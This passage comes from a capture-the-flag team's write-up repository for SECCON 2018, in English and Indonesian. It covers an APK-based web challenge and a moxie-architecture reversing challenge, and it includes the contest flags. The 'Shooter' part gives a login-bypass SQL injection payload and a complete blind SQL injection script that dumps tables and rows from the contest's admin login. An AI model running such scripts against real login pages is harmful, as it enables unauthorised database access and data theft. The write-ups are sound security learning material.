| mid = (lo+hi)//2 145 | s = "select ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = '{}'),{},1)) > {}" 146 | s = s.format(table_name, len(columns)+1, mid) 147 | if check(s): 148 | lo = mid+1 149 | else: 150 | hi = mid-1 151 | if lo == 0: 152 | return columns 153 | columns += chr(lo) 154 | print(columns) 155 | 156 | dump_columns("flags") 157 | ``` 158 | 159 | We got this output. 160 | ``` 161 | i 162 | id 163 | id, 164 | id,v 165 | ... 166 | id,value,created_at,updated_a 167 | id,value,created_at,updated_at 168 | ``` 169 | 170 | Okay now we should dump all rows with `value` column. 171 | ```python 172 | ... 173 | def dump_flag(): 174 | flag = "" 175 | while 1: 176 | lo = 0 177 | hi = 255 178 | while lo <= hi: 179 | mid = (lo+hi)//2 180 | s = "select ascii(substr((select group_concat(value) from flags),{},1)) > {}" 181 | s = s.format(len(flag)+1, mid) 182 | if check(s): 183 | lo = mid+1 184 | else: 185 | hi = mid-1 186 | if lo == 0: 187 | return flag 188 | flag += chr(lo) 189 | print(flag) 190 | 191 | dump_flag() 192 | ``` 193 | 194 | We got this output, and the flag is valid! 195 | ``` 196 | S 197 | SE 198 | SEC 199 | SECC 200 | ... 201 | SECCON{1NV4L1D_4DM1N_P4G3_4U+H3NT1C4T10 202 | SECCON{1NV4L1D_4DM1N_P4G3_4U+H3NT1C4T10N 203 | SECCON{1NV4L1D_4DM1N_P4G3_4U+H3NT1C4T10N} 204 | ``` 205 | 206 | Flag: `SECCON{1NV4L1D_4DM1N_P4G3_4U+H3NT1C4T10N}` 207 | 208 | ## Bahasa Indonesia 209 | Kami mempelajari bahwa APK di-build dengan Unity. Terdapat juga file `lib/x86/libil2cpp.so`, menandakan bahwa di-build juga dengan [IL2CPP](https://docs.unity3d.com/Manual/IL2CPP.html). Kami menggunakan [IL2CppDumper](https://github.com/Perfare/Il2CppDumper) untuk menganalisas APK ini, dan memasukkan file `lib/x86/libil2cpp.so` dan `assets/bin/Data/Managed/Metadata/global-metadata.dat` dari APK. Kami menggunakan metode `Auto (Plus)` untuk dump-nya. Kemudian program tersebut membuat beberapa file, dan yang paling menarik adalah `dump.cs` and `script.py`. 210 | 211 | File `dump.cs` berisi class dan interface. 212 | ```c# 213 | ... 214 | public static class Config // TypeDefIndex: 3750 215 | { 216 | // Fields 217 | public static string domain; // 0x0 218 | public static string stgDomain; // 0x4 219 | public static string devDomain; // 0x8 220 | public static string adminApi; // 0xC 221 | } 222 | ... 223 | public class GameDirector : MonoBehaviour // TypeDefIndex: 3753 224 | { 225 | // Methods 226 | public void .ctor(); // 0xB1BF86 227 | private void Start(); // 0xB1C018 228 | private void ChangeStep(); // 0xB1C123 229 | private void HandleChangingStep(); // 0xB1C13B 230 | private void Update(); // 0xB1C41C 231 | public void UpdateScore(); // 0xB1C283 232 | public void UpdateMiss(); // 0xB1C36D 233 | public void UpdateRanking(string rankingText); // 0xB1C450 234 | public void AddScore(float score); // 0xB1C4F9 235 | public void IncrementMiss(); // 0xB1C530 236 | public void SubmitScore(); // 0xB1C5D3 237 | public void Retry(); // 0xB1C7B6 238 | private IEnumerator PostScore(string name, int score); // 0xB1C716 239 | } 240 | ... 241 | ``` 242 | 243 | File `script.py` berisi symbol yang berhasil dilakukan recovery dan dapat dijalankan di IDA untuk mengembalikan nama fungsi dan symbol. 244 | ```python 245 | ... 246 | SetString(0x11BB818, r'shooter.pwn.seccon.jp') 247 | SetString(0x11BB81C, r'staging.shooter.pwn.seccon.jp') 248 | SetString(0x11BB820, r'develop.shooter.pwn.seccon.jp') 249 | SetString(0x11BB824, r'/admin') 250 | SetString(0x11BB828, r'Score') 251 | SetString(0x11BB82C, r'Miss') 252 | SetString(0x11BB830, r'PlaneGenerator') 253 | SetString(0x11BB834, r'ScoreFormView') 254 | SetString(0x11BB838, r'RankingView') 255 | SetString(0x11BB83C, r'Ranking') 256 | SetString(0x11BB840, r'score') 257 | SetString(0x11BB844, r'/api/v1/scores') 258 | ... 259 | ``` 260 | 261 | Kami mendapat beberapa domain dan endpoint yang menarik. Kami mencoba mengakses 262 | http://staging.shooter.pwn.seccon.jp/admin/ dan di-redirect ke halaman login. 263 | 264 | ![login](shooter_login.png) 265 | 266 | Kami mencoba melakukan fuzzing, dan mendapat error jika password mengandung karakter `'`. 267 | 268 | ![error](shooter_error.png) 269 | 270 | Kami menduga bahwa halaman tersebut vulnerable terhadap SQL injection. Kami meneruskan fuzzing dan akhirnya dapat login dengan password `'))) or 1-- -`! Dari sini kita dapat melihat 20 skor terakhir. 271 | 272 | ![scores](shooter_scores.png) 273 | 274 | Akan tetapi, selain itu tidak ada yang menarik. Kami mencoba untuk dump semua tabel database dengan teknik boolean-based SQL injection. Kami juga menggunakan algoritma binary search untuk mempercepat prosesnya. 275 | 276 | ```python 277 | import requests 278 | import re 279 | import string 280 | 281 | def check(s): 282 | sess = requests.Session() 283 | r = sess.get("http://staging.shooter.pwn.seccon.jp/admin/sessions/new") 284 | auth_token = re.findall(r'name="authenticity_token" value="(.+?)"', r.text)[0] 285 | data = { 286 | "login_id": "admin", 287 | "authenticity_token": auth_token, 288 | "password": "')))||(select case when ({}) then 1 else 0 end)#".format(s) 289 | } 290 | r = sess.post("http://staging.shooter.pwn.seccon.jp/admin/sessions", data=data) 291 | if not r.ok: 292 | return False 293 | r = sess.get("http://staging.shooter.pwn.seccon.jp/admin/users", allow_redirects=False) 294 | return r.status_code == 200 295 | 296 | def dump_tables(): 297 | tables = "" 298 | while 1: 299 | lo = 0 300 | hi = 255 301 | while lo <= hi: 302 | mid = (lo+hi)//2 303 | s = "select ascii(substr((select group_concat(table_name) from information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'),{},1)) > {}" 304 | s = s.format(len(tables)+1,mid) 305 | if check(s): 306 | lo = mid+1 307 | else: 308 | hi = mid-1 309 | if lo == 0: 310 | return tables 311 | tables += chr(lo) 312 | print(tables) 313 | 314 | dump_tables() 315 | ``` 316 | 317 | Kami mendapatkan output ini. 318 | ``` 319 | a 320 | ar 321 | ar_ 322 | ar_i 323 | ... 324 | ar_internal_metadata,flags,managers,schema_migrations,score 325 | ar_internal_metadata,flags,managers,schema_migrations,scores 326 | ``` 327 | 328 | Tabel `flags` terlihat menarik. Kemudian kami melakukan dump kolom untuk tabel tersebut. 329 | 330 | ```python 331 | ... 332 | def dump_columns(table_name): 333 | columns = "" 334 | while 1: 335 | lo = 0 336 | hi = 255 337 | while lo <= hi: 338 | mid = (lo+hi)//2 339 | s = "select ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = '{}'),{},1)) > {}" 340 | s = s.format(table_name, len(columns)+1, mid) 341 | if check(s): 342 | lo = mid+1 343 | else: 344 | hi = mid-1 345 | if lo == 0: 346 | return columns 347 | columns += chr(lo) 348 | print(columns) 349 | 350 | dump_columns("flags") 351 | ``` 352 | 353 | Kami mendapatkan output ini. 354 | ``` 355 | i 356 | id 357 | id, 358 | id,v 359 | ... 360 | id,value,created_at,updated_a 361 | id,value,created_at,updated_at 362 | ``` 363 | 364 | Oke sekarang saatnya melakukan dump semua baris dengan kolom `value`. 365 | ```python 366 | ... 367 | def dump_flag(): 368 | flag = "" 369 | while 1: 370 | lo = 0 371 | hi = 255 372 | while lo <= hi: 373 | mid = (lo+hi)//2 374 | s = "select ascii(substr((select group_concat(value) from flags),{},1)) > {}" 375 | s = s.format(len(flag)+1, mid) 376 | if check(s): 377 | lo = mid+1 378 | else: 379 | hi = mid-1 380 | if lo == 0: 381 | return flag 382 | flag += chr(lo) 383 | print(flag) 384 | 385 | dump_flag() 386 | ``` 387 | 388 | Kami mendapatkan output ini, dan flagnya valid! 389 | ``` 390 | S 391 | SE 392 | SEC 393 | SECC 394 | ... 395 | SECCON{1NV4L1D_4DM1N_P4G3_4U+H3NT1C4T10 396 | SECCON{1NV4L1D_4DM1N_P4G3_4U+H3NT1C4T10N 397 | SECCON{1NV4L1D_4DM1N_P4G3_4U+H3NT1C4T10N} 398 | ``` 399 | 400 | Flag: `SECCON{1NV4L1D_4DM1N_P4G3_4U+H3NT1C4T10N}` -------------------------------------------------------------------------------- /seccon2018/shooter/shooter.apk_d0d2ed9e7ba3c83354cbbf7ccf82541730b14a72: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/shooter/shooter.apk_d0d2ed9e7ba3c83354cbbf7ccf82541730b14a72 -------------------------------------------------------------------------------- /seccon2018/shooter/shooter_error.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/shooter/shooter_error.png -------------------------------------------------------------------------------- /seccon2018/shooter/shooter_login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/shooter/shooter_login.png -------------------------------------------------------------------------------- /seccon2018/shooter/shooter_scores.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/shooter/shooter_scores.png -------------------------------------------------------------------------------- /seccon2018/shooter/solve_shooter.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import string 4 | 5 | def check(s): 6 | sess = requests.Session() 7 | r = sess.get("http://staging.shooter.pwn.seccon.jp/admin/sessions/new") 8 | auth_token = re.findall(r'name="authenticity_token" value="(.+?)"', r.text)[0] 9 | data = { 10 | "login_id": "admin", 11 | "authenticity_token": auth_token, 12 | "password": "')))||(select case when ({}) then 1 else 0 end)#".format(s) 13 | } 14 | r = sess.post("http://staging.shooter.pwn.seccon.jp/admin/sessions", data=data) 15 | if not r.ok: 16 | return False 17 | r = sess.get("http://staging.shooter.pwn.seccon.jp/admin/users", allow_redirects=False) 18 | return r.status_code == 200 19 | 20 | def dump_tables(): 21 | tables = "" 22 | while 1: 23 | lo = 0 24 | hi = 255 25 | while lo <= hi: 26 | mid = (lo+hi)//2 27 | s = "select ascii(substr((select group_concat(table_name) from information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'),{},1)) > {}" 28 | s = s.format(len(tables)+1,mid) 29 | if check(s): 30 | lo = mid+1 31 | else: 32 | hi = mid-1 33 | if lo == 0: 34 | return tables 35 | tables += chr(lo) 36 | print(tables) 37 | 38 | def dump_columns(table_name): 39 | columns = "" 40 | while 1: 41 | lo = 0 42 | hi = 255 43 | while lo <= hi: 44 | mid = (lo+hi)//2 45 | s = "select ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = '{}'),{},1)) > {}" 46 | s = s.format(table_name, len(columns)+1, mid) 47 | if check(s): 48 | lo = mid+1 49 | else: 50 | hi = mid-1 51 | if lo == 0: 52 | return columns 53 | columns += chr(lo) 54 | print(columns) 55 | 56 | def dump_flag(): 57 | flag = "" 58 | while 1: 59 | lo = 0 60 | hi = 255 61 | while lo <= hi: 62 | mid = (lo+hi)//2 63 | s = "select ascii(substr((select group_concat(value) from flags),{},1)) > {}" 64 | s = s.format(len(flag)+1, mid) 65 | if check(s): 66 | lo = mid+1 67 | else: 68 | hi = mid-1 69 | if lo == 0: 70 | return flag 71 | flag += chr(lo) 72 | print(flag) 73 | 74 | dump_tables() 75 | print() 76 | 77 | dump_columns("flags") 78 | print() 79 | 80 | dump_flag() 81 | print() 82 | -------------------------------------------------------------------------------- /seccon2018/special-device-file/README.md: -------------------------------------------------------------------------------- 1 | # Special Device File 2 | --- 3 | **Points:** 231 | **Solves:** 75/653 | **Category:** Reversing 4 | 5 | Special Device File 6 | 7 | Execute this file and get the flag. 8 | 9 | References: 10 | 11 | Assembly samples for many architectures 12 | http://kozos.jp/books/asm/cross-gcc494-v1.0.zip 13 | 14 | See the assembly samples. 15 | 16 | $ unzip cross-gcc494-v1.0.zip $ cd cross-gcc494/sample $ ls *.d 17 | 18 | See the sample programs running on GDB simulator. 19 | 20 | $ cd cross-gcc494/exec $ ls *.d 21 | 22 | [Download](runme_8a10b7425cea81a043db0fd352c82a370a2d3373) 23 | 24 | --- 25 | 26 | [Bahasa Indonesia](#bahasa-indonesia) 27 | 28 | ## English 29 | TODO 30 | 31 | 32 | ## Bahasa Indonesia 33 | TODO 34 | -------------------------------------------------------------------------------- /seccon2018/special-device-file/runme_8a10b7425cea81a043db0fd352c82a370a2d3373: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/seccon2018/special-device-file/runme_8a10b7425cea81a043db0fd352c82a370a2d3373 -------------------------------------------------------------------------------- /seccon2018/special-instructions/README.md: -------------------------------------------------------------------------------- 1 | # Special Instructions 2 | --- 3 | **Points:** 262 | **Solves:** 61/653 | **Category:** Reversing 4 | 5 | Execute this file and get the flag. 6 | 7 | References: Assembly samples for many architectures 8 | http://kozos.jp/books/asm/cross-gcc494-v1.0.zip 9 | 10 | See the assembly samples. 11 | 12 | ``` 13 | $ unzip cross-gcc494-v1.0.zip 14 | $ cd cross-gcc494/sample 15 | $ ls *.d 16 | ``` 17 | 18 | See the sample programs running on GDB simulator. 19 | 20 | ``` 21 | $ cd cross-gcc494/exec 22 | $ ls *.d 23 | ``` 24 | 25 | [Download](runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be) 26 | 27 | --- 28 | 29 | [Bahasa Indonesia](#bahasa-indonesia) 30 | 31 | ## English 32 | We were given an ELF 32-bit with unknown architecture. 33 | ```sh 34 | $ file runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be 35 | runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be: ELF 32-bit MSB executable, *unknown arch 0xdf* version 1 (SYSV), statically linked, not stripped 36 | ``` 37 | 38 | Basic recon using `strings`, we found the architecture is `moxie`. 39 | ```sh 40 | $ strings runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be 41 | ,.U7 42 | 0123456789abcdef 43 | This program uses special instructions. 44 | SETRSEED: (Opcode:0x16) 45 | RegA -> SEED 46 | GETRAND: (Opcode:0x17) 47 | xorshift32(SEED) -> SEED 48 | SEED -> RegA 49 | GCC: (GNU) 4.9.4 50 | moxie-elf.c 51 | ... 52 | ``` 53 | 54 | We couldn't disassemble it with `objdump` or `IDA`. We decided to make our own [simple disassembler](disas_moxie.py) by reading [this documentation](http://moxielogic.org/blog/pages/architecture.html). 55 | ``` 56 | $ python disas_moxie.py 57 | function main 58 | 0x136c: 06 18 push $sp, $r6 59 | 0x136e: 91 18 dec $sp, 0x24 60 | 0x1370: 01 20 ldi.l $r0, 0x92d68ca2 61 | 0x1376: 03 00 jsra set_random_seed 62 | 0x137c: 01 80 ldi.l $r6, puts 63 | 0x1382: 01 20 ldi.l $r0, 0x1 64 | 0x1388: 01 30 ldi.l $r1, "This program uses special instructions.\n\n" 65 | 0x138e: 19 80 jsr $r6 66 | 0x1390: 01 20 ldi.l $r0, 0x1 67 | 0x1396: 01 30 ldi.l $r1, "SETRSEED: (Opcode:0x16)\n" 68 | 0x139c: 19 80 jsr $r6 69 | 0x139e: 01 20 ldi.l $r0, 0x1 70 | 0x13a4: 01 30 ldi.l $r1, " RegA -> SEED\n\n" 71 | 0x13aa: 19 80 jsr $r6 72 | 0x13ac: 01 20 ldi.l $r0, 0x1 73 | 0x13b2: 01 30 ldi.l $r1, "GETRAND: (Opcode:0x17)\n" 74 | 0x13b8: 19 80 jsr $r6 75 | 0x13ba: 01 20 ldi.l $r0, 0x1 76 | 0x13c0: 01 30 ldi.l $r1, " xorshift32(SEED) -> SEED\n" 77 | 0x13c6: 19 80 jsr $r6 78 | 0x13c8: 01 20 ldi.l $r0, 0x1 79 | 0x13ce: 01 30 ldi.l $r1, " SEED -> RegA\n\n" 80 | 0x13d4: 19 80 jsr $r6 81 | 0x13d6: 01 20 ldi.l $r0, flag 82 | 0x13dc: 01 30 ldi.l $r1, randval 83 | 0x13e2: 03 00 jsra decode 84 | 0x13e8: 02 32 mov $r1, $r0 85 | 0x13ea: 01 20 ldi.l $r0, 0x1 86 | 0x13f0: 19 80 jsr $r6 87 | 0x13f2: 01 20 ldi.l $r0, 0x1 88 | 0x13f8: 01 30 ldi.l $r1, "\n" 89 | 0x13fe: 19 80 jsr $r6 90 | 0x1400: 2e 22 xor $r0, $r0 91 | 0x1402: 03 00 jsra exit 92 | 93 | function decode 94 | 0x136c: 06 18 push $sp, $r6 95 | 0x136e: 06 19 push $sp, $r7 96 | 0x1370: 06 1a push $sp, $r8 97 | 0x1372: 06 1b push $sp, $r9 98 | 0x1374: 06 1c push $sp, $r10 99 | 0x1376: 06 1d push $sp, $r11 100 | 0x1378: 91 18 dec $sp, 0x24 101 | 0x137a: 02 d2 mov $r11, $r0 102 | 0x137c: 1c 42 ld.b $r2, ($r0) 103 | 0x137e: 2e 22 xor $r0, $r0 104 | 0x1380: 0e 42 cmp $r2, $r0 105 | 0x1382: c0 12 beq 0x??? 106 | 0x1384: 02 a3 mov $r8, $r1 107 | 0x1386: 02 9d mov $r7, $r11 108 | 0x1388: 01 c0 ldi.l $r10, get_random_value 109 | 0x138e: 1c 8a ld.b $r6, ($r8) 110 | 0x1390: 2e 22 xor $r0, $r0 111 | 0x1392: 19 c0 jsr $r10 112 | 0x1394: 2e 82 xor $r6, $r0 113 | 0x1396: 1c 29 ld.b $r0, ($r7) 114 | 0x1398: 2e 82 xor $r6, $r0 115 | 0x139a: 1e 98 st.b ($r7), $r6 116 | 0x139c: 89 01 inc $r7, 0x1 117 | 0x139e: 8a 01 inc $r8, 0x1 118 | 0x13a0: 1c 39 ld.b $r1, ($r7) 119 | 0x13a2: 2e 22 xor $r0, $r0 120 | 0x13a4: 0e 32 cmp $r1, $r0 121 | 0x13a6: c7 f3 bne 0x??? 122 | 0x13a8: 02 2d mov $r0, $r11 123 | 0x13aa: 02 e0 mov $r12, $fp 124 | 0x13ac: 9e 18 dec $r12, 0x24 125 | 0x13ae: 07 ed pop $r12, $r11 126 | 0x13b0: 07 ec pop $r12, $r10 127 | 0x13b2: 07 eb pop $r12, $r9 128 | 0x13b4: 07 ea pop $r12, $r8 129 | 0x13b6: 07 e9 pop $r12, $r7 130 | 0x13b8: 07 e8 pop $r12, $r6 131 | 0x13ba: 04 00 ret 132 | 133 | function set_random_seed 134 | 0x136c: 16 20 ??? 135 | 0x136e: 04 00 ret 136 | 137 | function get_random_value 138 | 0x136c: 17 20 ??? 139 | 0x136e: 04 00 ret 140 | 141 | flag: 6d72c3e2cf95549db6ac0384c3c23593c3d77ce2ddd4ac5e99c9a534de064e00 142 | randval: 3d05dc31d18aaf2996facb1b01ece2f715706cf47ea19e0e01f9c24cbaa0a108 143 | ``` 144 | 145 | The pseudocode roughly looks like this. 146 | ```python 147 | flag = "6d72c3e2cf95549db6ac0384c3c23593c3d77ce2ddd4ac5e99c9a534de064e00" 148 | randval = "3d05dc31d18aaf2996facb1b01ece2f715706cf47ea19e0e01f9c24cbaa0a108" 149 | def main(): 150 | set_random_seed(0x92d68ca2) 151 | puts("...") 152 | puts(decode(flag, randval)) 153 | 154 | def decode(flag, randval): 155 | i = 0 156 | while flag[i]: 157 | flag[i] ^= randval[i] ^ get_random_value() 158 | i += 1 159 | return flag 160 | ``` 161 | 162 | Function `set_random_seed` and `get_random_value` are compiled with special instructions. From strings inside the binary, we know that: 163 | ``` 164 | SETRSEED: (Opcode:0x16) 165 | RegA -> SEED 166 | GETRAND: (Opcode:0x17) 167 | xorshift32(SEED) -> SEED 168 | SEED -> RegA 169 | ``` 170 | 171 | We tried several `xorshift32` implementations (there are many variants in the internet), then we got the flag using this script. 172 | ```python 173 | import numpy as np 174 | 175 | state = np.uint32(0x92d68ca2) 176 | def xorshift(): 177 | global state 178 | state ^= np.uint32(state << 13); 179 | state ^= np.uint32(state >> 17); 180 | state ^= np.uint32(state << 15); 181 | return np.uint32(state); 182 | 183 | flag = "6d72c3e2cf95549db6ac0384c3c23593c3d77ce2ddd4ac5e99c9a534de064e00".decode("hex") 184 | r = "3d05dc31d18aaf2996facb1b01ece2f715706cf47ea19e0e01f9c24cbaa0a108".decode("hex") 185 | 186 | s = "" 187 | for i, c in enumerate(flag): 188 | if c == "\x00": 189 | break 190 | xorshift() 191 | s += chr((ord(c) ^ ord(r[i]) ^ state) & 0xff) 192 | print s 193 | ``` 194 | 195 | Flag: `SECCON{MakeSpecialInstructions}` 196 | 197 | ## Bahasa Indonesia 198 | Kami diberikan sebuah file ELF 32-bit dengan arsitektur yang tidak diketahui. 199 | ```sh 200 | $ file runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be 201 | runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be: ELF 32-bit MSB executable, *unknown arch 0xdf* version 1 (SYSV), statically linked, not stripped 202 | ``` 203 | 204 | Dengan menggunakan `strings`, kita mendapatkan bahwa arsitekturnya adalah `moxie`. 205 | ```sh 206 | $ strings runme_f3abe874e1d795ffb6a3eed7898ddcbcd929b7be 207 | ,.U7 208 | 0123456789abcdef 209 | This program uses special instructions. 210 | SETRSEED: (Opcode:0x16) 211 | RegA -> SEED 212 | GETRAND: (Opcode:0x17) 213 | xorshift32(SEED) -> SEED 214 | SEED -> RegA 215 | GCC: (GNU) 4.9.4 216 | moxie-elf.c 217 | ... 218 | ``` 219 | 220 | Kami tidak dapat melakukan disassemble dengan `objdump` atau `IDA`, sehingga kami memutuskan untuk membuat sendiri [disassembler-nya](disas_moxie.py) dengan membaca [dokumentasi ini](http://moxielogic.org/blog/pages/architecture.html). 221 | ``` 222 | $ python disas_moxie.py 223 | function main 224 | 0x136c: 06 18 push $sp, $r6 225 | 0x136e: 91 18 dec $sp, 0x24 226 | 0x1370: 01 20 ldi.l $r0, 0x92d68ca2 227 | 0x1376: 03 00 jsra set_random_seed 228 | 0x137c: 01 80 ldi.l $r6, puts 229 | 0x1382: 01 20 ldi.l $r0, 0x1 230 | 0x1388: 01 30 ldi.l $r1, "This program uses special instructions.\n\n" 231 | 0x138e: 19 80 jsr $r6 232 | 0x1390: 01 20 ldi.l $r0, 0x1 233 | 0x1396: 01 30 ldi.l $r1, "SETRSEED: (Opcode:0x16)\n" 234 | 0x139c: 19 80 jsr $r6 235 | 0x139e: 01 20 ldi.l $r0, 0x1 236 | 0x13a4: 01 30 ldi.l $r1, " RegA -> SEED\n\n" 237 | 0x13aa: 19 80 jsr $r6 238 | 0x13ac: 01 20 ldi.l $r0, 0x1 239 | 0x13b2: 01 30 ldi.l $r1, "GETRAND: (Opcode:0x17)\n" 240 | 0x13b8: 19 80 jsr $r6 241 | 0x13ba: 01 20 ldi.l $r0, 0x1 242 | 0x13c0: 01 30 ldi.l $r1, " xorshift32(SEED) -> SEED\n" 243 | 0x13c6: 19 80 jsr $r6 244 | 0x13c8: 01 20 ldi.l $r0, 0x1 245 | 0x13ce: 01 30 ldi.l $r1, " SEED -> RegA\n\n" 246 | 0x13d4: 19 80 jsr $r6 247 | 0x13d6: 01 20 ldi.l $r0, flag 248 | 0x13dc: 01 30 ldi.l $r1, randval 249 | 0x13e2: 03 00 jsra decode 250 | 0x13e8: 02 32 mov $r1, $r0 251 | 0x13ea: 01 20 ldi.l $r0, 0x1 252 | 0x13f0: 19 80 jsr $r6 253 | 0x13f2: 01 20 ldi.l $r0, 0x1 254 | 0x13f8: 01 30 ldi.l $r1, "\n" 255 | 0x13fe: 19 80 jsr $r6 256 | 0x1400: 2e 22 xor $r0, $r0 257 | 0x1402: 03 00 jsra exit 258 | 259 | function decode 260 | 0x136c: 06 18 push $sp, $r6 261 | 0x136e: 06 19 push $sp, $r7 262 | 0x1370: 06 1a push $sp, $r8 263 | 0x1372: 06 1b push $sp, $r9 264 | 0x1374: 06 1c push $sp, $r10 265 | 0x1376: 06 1d push $sp, $r11 266 | 0x1378: 91 18 dec $sp, 0x24 267 | 0x137a: 02 d2 mov $r11, $r0 268 | 0x137c: 1c 42 ld.b $r2, ($r0) 269 | 0x137e: 2e 22 xor $r0, $r0 270 | 0x1380: 0e 42 cmp $r2, $r0 271 | 0x1382: c0 12 beq 0x??? 272 | 0x1384: 02 a3 mov $r8, $r1 273 | 0x1386: 02 9d mov $r7, $r11 274 | 0x1388: 01 c0 ldi.l $r10, get_random_value 275 | 0x138e: 1c 8a ld.b $r6, ($r8) 276 | 0x1390: 2e 22 xor $r0, $r0 277 | 0x1392: 19 c0 jsr $r10 278 | 0x1394: 2e 82 xor $r6, $r0 279 | 0x1396: 1c 29 ld.b $r0, ($r7) 280 | 0x1398: 2e 82 xor $r6, $r0 281 | 0x139a: 1e 98 st.b ($r7), $r6 282 | 0x139c: 89 01 inc $r7, 0x1 283 | 0x139e: 8a 01 inc $r8, 0x1 284 | 0x13a0: 1c 39 ld.b $r1, ($r7) 285 | 0x13a2: 2e 22 xor $r0, $r0 286 | 0x13a4: 0e 32 cmp $r1, $r0 287 | 0x13a6: c7 f3 bne 0x??? 288 | 0x13a8: 02 2d mov $r0, $r11 289 | 0x13aa: 02 e0 mov $r12, $fp 290 | 0x13ac: 9e 18 dec $r12, 0x24 291 | 0x13ae: 07 ed pop $r12, $r11 292 | 0x13b0: 07 ec pop $r12, $r10 293 | 0x13b2: 07 eb pop $r12, $r9 294 | 0x13b4: 07 ea pop $r12, $r8 295 | 0x13b6: 07 e9 pop $r12, $r7 296 | 0x13b8: 07 e8 pop $r12, $r6 297 | 0x13ba: 04 00 ret 298 | 299 | function set_random_seed 300 | 0x136c: 16 20 ??? 301 | 0x136e: 04 00 ret 302 | 303 | function get_random_value 304 | 0x136c: 17 20 ??? 305 | 0x136e: 04 00 ret 306 | 307 | flag: 6d72c3e2cf95549db6ac0384c3c23593c3d77ce2ddd4ac5e99c9a534de064e00 308 | randval: 3d05dc31d18aaf2996facb1b01ece2f715706cf47ea19e0e01f9c24cbaa0a108 309 | ``` 310 | 311 | Pseudocode-nya kira-kira seperti ini. 312 | ```python 313 | flag = "6d72c3e2cf95549db6ac0384c3c23593c3d77ce2ddd4ac5e99c9a534de064e00" 314 | randval = "3d05dc31d18aaf2996facb1b01ece2f715706cf47ea19e0e01f9c24cbaa0a108" 315 | def main(): 316 | set_random_seed(0x92d68ca2) 317 | puts("...") 318 | puts(decode(flag, randval)) 319 | 320 | def decode(flag, randval): 321 | i = 0 322 | while flag[i]: 323 | flag[i] ^= randval[i] ^ get_random_value() 324 | i += 1 325 | return flag 326 | ``` 327 | 328 | Fungsi `set_random_seed` dan `get_random_value` dikompilasi dengan instruksi spesial. Dari string di dalam binary, kita mendapat hint bahwa: 329 | ``` 330 | SETRSEED: (Opcode:0x16) 331 | RegA -> SEED 332 | GETRAND: (Opcode:0x17) 333 | xorshift32(SEED) -> SEED 334 | SEED -> RegA 335 | ``` 336 | 337 | Kami mencoba beberapa implementasi `xorshift32` (di internet ada beberapa varian fungsi tersebut), kemudian kami mendapat flag dengan script ini. 338 | ```python 339 | import numpy as np 340 | 341 | state = np.uint32(0x92d68ca2) 342 | def xorshift(): 343 | global state 344 | state ^= np.uint32(state << 13); 345 | state ^= np.uint32(state >> 17); 346 | state ^= np.uint32(state << 15); 347 | return np.uint32(state); 348 | 349 | flag = "6d72c3e2cf95549db6ac0384c3c23593c3d77ce2ddd4ac5e99c9a534de064e00".decode("hex") 350 | r = "3d05dc31d18aaf2996facb1b01ece2f715706cf47ea19e0e01f9c24cbaa0a108".decode("hex") 351 | 352 | s = "" 353 | for i, c in enumerate(flag): 354 | if c == "\x00": 355 | break 356 | xorshift() 357 | s += chr((ord(c) ^ ord(r[i]) ^ state) & 0xff) 358 | print s 359 | ``` 360 | 361 | Flag: `SECCON{MakeSpecialInstructions}` -------------------------------------------------------------------------------- /seccon2018/special-instructions/disas_moxie.py: -------------------------------------------------------------------------------- 1 | import string 2 | from pwn import * 3 | context.log_level = 'critical' 4 | 5 | def disas(code, address, base_address, e): 6 | s = code 7 | base = base_address 8 | 9 | def reg(x): 10 | if x == 0: 11 | return "$fp" 12 | elif x == 1: 13 | return "$sp" 14 | elif x <= 15: 15 | return "$r%d" % (x-2) 16 | return "$r???" 17 | 18 | def addr(start, length): 19 | x = ''.join([chr(s[i]) for i in xrange(start, start+length)]) 20 | x = x[::-1] 21 | if length == 1: 22 | a = u8(x) 23 | elif length == 2: 24 | a = u16(x) 25 | elif length == 4: 26 | a = u32(x) 27 | elif length == 8: 28 | a = u64(x) 29 | else: 30 | assert False 31 | for name, value in e.symbols.items(): 32 | if value == a: 33 | return name 34 | 35 | st = "" 36 | cur = a 37 | while 1: 38 | try: 39 | c = e.read(cur, 1) 40 | except: 41 | return hex(a) 42 | if ord(c) == 0: 43 | break 44 | if c not in string.printable: 45 | return hex(a) 46 | st += c 47 | cur += 1 48 | return '"%s"' % st.replace("\n", "\\n") 49 | 50 | s = [ord(c) for c in s] 51 | i = 0 52 | while i < len(s): 53 | ins = s[i] 54 | ins = bin(ins)[2:] 55 | ins = ins.zfill(8) 56 | add = 0 57 | 58 | if ins.startswith("00100110"): 59 | mnemonic = "and %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 60 | elif ins.startswith("00000101"): 61 | mnemonic = "add %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 62 | elif ins.startswith("00101000"): 63 | mnemonic = "ashl %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 64 | elif ins.startswith("00101101"): 65 | mnemonic = "ashr %s, %s" % (reg(s[i+1] >> 4), reg(s[i+1] & 0xF)) 66 | elif ins.startswith("110000"): 67 | mnemonic = "beq 0x???" 68 | elif ins.startswith("110110"): 69 | mnemonic = "bge 0x???" 70 | elif 